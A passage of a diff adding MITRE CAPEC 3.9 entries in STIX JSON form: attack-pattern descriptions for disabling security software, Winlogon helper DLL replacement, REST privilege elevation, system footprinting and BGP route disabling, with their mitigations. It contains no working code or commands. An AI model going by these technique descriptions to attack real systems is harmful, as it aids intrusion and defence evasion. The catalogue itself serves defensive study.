+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper permissions on files and folders are enacted to limit accessibility.", + "id": "course-of-action--583c7488-8859-4641-9143-4a55cfb23722", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-577-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d75f4c7-4ed6-4b8d-92af-9a3ef1ed2ea7", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--583c7488-8859-4641-9143-4a55cfb23722", + "target_ref": "attack-pattern--3dfa08af-9677-4a4d-a3f0-a1c5042c9497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to disable security tools so that detection does not occur. 
This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.", + "external_references": [ + { + "external_id": "CAPEC-578", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/578.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Modify Authentication Process: Multi-Factor Authentication", + "external_id": "T1556.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1556/006" + }, + { + "description": "Impair Defenses: Disable or Modify Tools", + "external_id": "T1562.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/001" + }, + { + "description": "Impair Defenses: Disable Windows Event Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Disable or Modify System Firewall", + "external_id": "T1562.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/004" + }, + { + "description": "Impair Defenses: Disable or Modify Cloud Firewall", + "external_id": "T1562.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/007" + }, + { + "description": "Impair Defenses: Disable Cloud Logs", + "external_id": "T1562.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/008" + }, + { + "description": "Impair Defenses: Safe Mode Boot", + "external_id": "T1562.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/009" + } + ], + "id": "attack-pattern--a2f42e82-a184-4df7-a8bb-6fc34787d571", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Disable Security Software", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Availability": [ + "Hide Activities (By disabling certain security tools, the adversary can hide malicious activity and avoid detection.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the capability to interact with the configuration of the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are in place to prevent adversaries from altering the execution status of security tools.", + "id": "course-of-action--be1b899d-d3f2-4d8f-807f-c8a13d7c193c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-578-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--99491706-558f-487d-aa01-04a8b8b5a6f5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1b899d-d3f2-4d8f-807f-c8a13d7c193c", + "target_ref": "attack-pattern--a2f42e82-a184-4df7-a8bb-6fc34787d571", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.", + "external_references": [ + { + "external_id": "CAPEC-579", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/579.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "Boot or Logon Autostart Execution: Winlogon helper DLL", + "external_id": "T1547.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/004" + } + ], + "id": "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Replace Winlogon Helper DLL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Changes to registry entries in \"HKLM\\Software\\Microsoft\\Windows NT\\Winlogon\\Notify\" that do not correlate with known software, patch cycles, etc are suspicious. 
New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.", + "id": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-579-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c9851cf-e6d2-463b-a389-c4c108572a95", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "target_ref": "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.", + "external_references": [ + { + "external_id": "CAPEC-58", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/58.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "description": "Mark O'Neill, Security for REST Web Services, Vprde;", + "external_id": "REF-463", + "source_name": "reference_from_CAPEC", + "url": "http://www.vordel.com/downloads/rsa_conf_2006.pdf" + } + ], + "id": 
"attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Restful Privilege Elevation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state." + ], + "x_capec_extended_description": "\n Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. 
The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete." + ], + "x_capec_skills_required": { + "Low": "It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8f217ad-8701-4a9c-9a22-a4c6022c4f51", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side", + "id": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-58-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09b1f116-7e91-47fc-8238-758d20861790", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose", + "id": "course-of-action--4f4d6165-fc50-42ef-9249-e1052676d841", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-58-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4a8f4717-a1fc-4334-8819-fadd7bafdf0f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f4d6165-fc50-42ef-9249-e1052676d841", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in active probing and exploration activities to determine security information about a remote 
target system. Often times adversaries will rely on remote applications that can be probed for system configurations.", + "external_references": [ + { + "external_id": "CAPEC-580", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "System Information Discovery", + "external_id": "T1082", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1082" + } + ], + "id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_prerequisites": [ + "The adversary must have logical access to the target network and system." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know basic linux commands." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ec163f5-ff75-4e9d-ac8d-0bd09b3e9121", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7d31992-837d-4b43-91fb-5fd7cffc161b", + "target_ref": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b970172-c7e3-45aa-a1de-1362a7f5756c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "target_ref": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries may attempt to get a listing of security tools that are installed on the system and their configurations. 
This may include security related system features (such as a built-in firewall or anti-spyware) as well as third-party security software.", + "external_references": [ + { + "external_id": "CAPEC-581", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/581.html" + }, + { + "description": "Software Discovery:Security Software Discovery", + "external_id": "T1518.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1518/001" + } + ], + "id": "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Security Software Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire security tool information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--5e2e2530-ac1b-4b0a-8889-a7058a982190", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-581-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--679fbac3-8799-4a09-948f-0d9e83b3765f", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--5e2e2530-ac1b-4b0a-8889-a7058a982190", + "target_ref": "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-14T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disables the network route between two targets. The goal is to completely sever the communications channel between two entities. This is often the result of a major error or the use of an \"Internet kill switch\" by those in control of critical infrastructure. This attack pattern differs from most other obstruction patterns by targeting the route itself, as opposed to the data passed over the route.", + "external_references": [ + { + "external_id": "CAPEC-582", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/582.html" + } + ], + "id": "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Route Disabling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a network route denies the availability of a service.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "attack-pattern--3cedbb3a-e97f-4bc7-ac36-2c1f0c360d08" + ], + "x_capec_prerequisites": [ + "The adversary requires knowledge of and access to network route." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.", + "external_references": [ + { + "external_id": "CAPEC-583", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/583.html" + }, + { + "description": "Analysis of Country-wide Internet Outages Caused by Censorship, 2011, Center for Applied Internet Data Analysis", + "external_id": "REF-464", + "source_name": "reference_from_CAPEC", + "url": "http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf" + } + ], + "id": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Disabling Network Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Hardware" + ], + "x_capec_prerequisites": [ + "The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure rigorous physical defensive measures to keep the adversary from accessing critical systems..", + "id": "course-of-action--f175c018-1dfe-4c0d-bec0-f5b9afb1d6a7", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-583-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52c0fc53-41a5-4784-b605-f2404b5643c9", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f175c018-1dfe-4c0d-bec0-f5b9afb1d6a7", + "target_ref": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary suppresses the Border Gateway Protocol (BGP) advertisement for a route so as to render the underlying network inaccessible. The BGP protocol helps traffic move throughout the Internet by selecting the most efficient route between Autonomous Systems (AS), or routing domains. BGP is the basis for interdomain routing infrastructure, providing connections between these ASs. 
By suppressing the intended AS routing advertisements and/or forcing less effective routes for traffic to ASs, the adversary can deny availability for the target network.", + "external_references": [ + { + "external_id": "CAPEC-584", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/584.html" + }, + { + "description": "Why is it Taking so Long to Secure Internet Routing?, 2014, ACM", + "external_id": "REF-465", + "source_name": "reference_from_CAPEC", + "url": "https://queue.acm.org/detail.cfm?id=2668966" + }, + { + "description": "Beware of BGP Attacks, 2004, ACM SIGCOMM", + "external_id": "REF-466", + "source_name": "reference_from_CAPEC", + "url": "http://www.cc.gatech.edu/~dovrolis/Papers/ccr-bgp.pdf" + } + ], + "id": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "modified": "2020-12-17T00:00:00.000Z", + "name": "BGP Route Disabling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a network route at the routing infrastructure level denies availability of that route.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Blackholing: The adversary intentionally references false routing advertisements in order to attract traffic to a particular router so it can be dropped." 
+ ], + "x_capec_prerequisites": [ + "The adversary must have control of a router that can modify, drop, or introduce spoofed BGP updates.The adversary can convince" + ], + "x_capec_resources_required": [ + "BGP Router" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement Ingress filters to check the validity of received routes. However, this relies on the accuracy of Internet Routing Registries (IRRs) databases which are often not well-maintained.", + "id": "course-of-action--32e9cc12-1ed9-4725-9fd2-d09ced47db65", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-584-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76b92e8e-8863-490a-a6e4-c241e602b86e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32e9cc12-1ed9-4725-9fd2-d09ced47db65", + "target_ref": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement Secure BGP (S-BGP protocol), which improves authorization and authentication capabilities based on public-key cryptography.", + "id": "course-of-action--1c733d77-23ad-4455-b854-996ea0d64125", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-584-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + 
}, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbf5fc63-f216-4101-9b1b-a09e8272547c", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1c733d77-23ad-4455-b854-996ea0d64125", + "target_ref": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary influences a target's web-hosting company to disable a target domain. The goal is to prevent access to the targeted service provided by that domain. It usually occurs as the result of civil or criminal legal interventions.", + "external_references": [ + { + "external_id": "CAPEC-585", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/585.html" + }, + { + "description": "Dozens of Online 'Dark Markets' Seized Pursuant to Forfeiture Complaint Filed in Manhattan Federal Court in Conjunction with the Arrest of the Operator of Silk Road 2.0, 2014, FBI", + "external_id": "REF-467", + "source_name": "reference_from_CAPEC", + "url": "https://www.fbi.gov/contact-us/field-offices/newyork/news/press-releases/dozens-of-online-dark-markets-seized-pursuant-to-forfeiture-complaint-filed-in-manhattan-federal-court-in-conjunction-with-the-arrest-of-the-operator-of-silk-road-2.0" + } + ], + "id": "attack-pattern--3cedbb3a-e97f-4bc7-ac36-2c1f0c360d08", + "modified": "2023-01-24T00:00:00.000Z", + "name": "DNS Domain Seizure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a target domain at the infrastructure level denies the availability of its service to the user.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The FBI's seizure of gambling websites, the US DOJ's seizure of child pornography websites, and Microsoft's seizure of all domains owned by the company No-IP in order to disrupt a cyberattack originating from a subset of those domains." + ], + "x_capec_prerequisites": [ + "This attack pattern requires that the adversary has cooperation from the registrar of the target domain." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. 
